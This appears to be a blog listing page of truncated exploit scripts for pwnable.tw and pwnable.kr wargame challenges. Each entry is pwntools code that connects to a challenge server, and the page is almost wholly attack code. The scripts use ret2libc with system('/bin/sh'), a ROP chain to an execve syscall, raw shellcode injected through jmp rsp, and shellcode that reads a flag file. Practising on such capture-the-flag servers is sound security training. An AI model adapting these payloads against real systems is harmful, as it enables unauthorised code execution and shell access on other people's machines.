[pwnable.tw] applestore 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758from pwn import * def add(n): r.sendlineafter("> ", '2') r.sendlineafter("Number> ", str(n)) r = remote('chall.pwnable.tw', 10104)#r = process("./applestore")e = ELF("./applestore")#libc = ELF("/lib/i386-linux-gnu/libc.so.6")libc = ELF("./libc_32.so.6") for i in range(6): add(1)for i in ran..
[pwnable.tw] orw 1234567891011121314from pwn import * r = remote('chall.pwnable.tw', 10001)context(arch='i386', os='linux') sm = ''sm += shellcraft.open('/home/orw/flag') sm += shellcraft.read(3, 'esp', 50) sm += shellcraft.write(1, 'esp', 50) sm += shellcraft.exit() r.sendlineafter(':', asm(sm)) r.interactive()Colored by Color Scriptercs
[pwnable.tw] silver_bullet 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960from pwn import * s = remote('chall.pwnable.tw', 10103)#s = process('./silver_bullet')e = ELF('./silver_bullet')libc = ELF('libc_32.so.6') pr = 0x8048475one = 0x5fbc5 s.sendlineafter('choice :', '1')s.sendafter('bullet :', 'A'*0x2f + '\x00') s.sendlineafter('choice :', '2')s.sendafter('..
[pwnable.tw] dubblesort 12345678910111213141516171819202122232425262728293031from pwn import * s = remote('chall.pwnable.tw', 10101)#s = process('./dubblesort', env={'LD_PRELOAD':'./libc_32.so.6'})#libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')libc = ELF('./libc_32.so.6') s.sendlineafter('name :', 'A'*24)s.recvuntil('AAAA\n')base = u32('\x00' + s.recv(3)) - 0x1b0000system = base + libc.symbols['system']binsh = base + n..
[pwnable.tw] calc 123456789101112131415+360+1+361+134595402 #pop_eax (calc function return address)+362-134595399 #3(read syscall num)+363+81545 #pop_edx_ecx_ebx+364-81537 #edx(size) = 8+365+135106815 #ecx(bss)+366-135106815 #0 ebx(fd)+367-428159 #syscall +368+134167244 #pop_eax+369-134167233 #11(execve syscall num)+370+509711 #pop_edx_ecx_ebx+371-509711 #0(edx)+372-509711 #0(ecx)+373+134678641 #bss(ebx)+374+15 #..
[pwnable.kr] md5 calculator 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647from pwn import *from base64 import *from ctypes import *import os libc = CDLL('libc.so.6')#s = process('./hash')s = remote('pwnable.kr', 9002)e = ELF('./hash') pr = 0x08048aa3pppr = 0x0804908bg_buf = 0x804B0E0cmd = "/bin/sh\x00" libc.srand(libc.time(0))random = []calc = 0for i in range(8): random.append(libc.ra..
[pwnable.kr] echo1 12345678910111213141516171819from pwn import * p = remote('pwnable.kr', 9010)context(arch='amd64',os='linux')id_addr = 0x6020a0shell = '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' jmp_rsp = asm('jmp rsp') payload = 'A'*0x28payload += p64(id_addr)payload += shell p.sendlineafter(' : ', jmp_rsp)p.sendlineafter('> ', '1')p.recv(1024)..
[pwnable.kr] brain fuck 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from pwn import * #p = process('./bf')p = remote('pwnable.kr',9001)#e = ELF('/lib/i386-linux-gnu/libc-2.23.so')e = ELF('./bf_libc.so') point = 0x804a0a0pnum = 0memset_got = 0x804a02cfgets_got = 0x804a010putchar_got = 0x804a030 pnum = point - fgets_gotpoint -= pnumpayload = '' * 4payload += '' * 4payloa..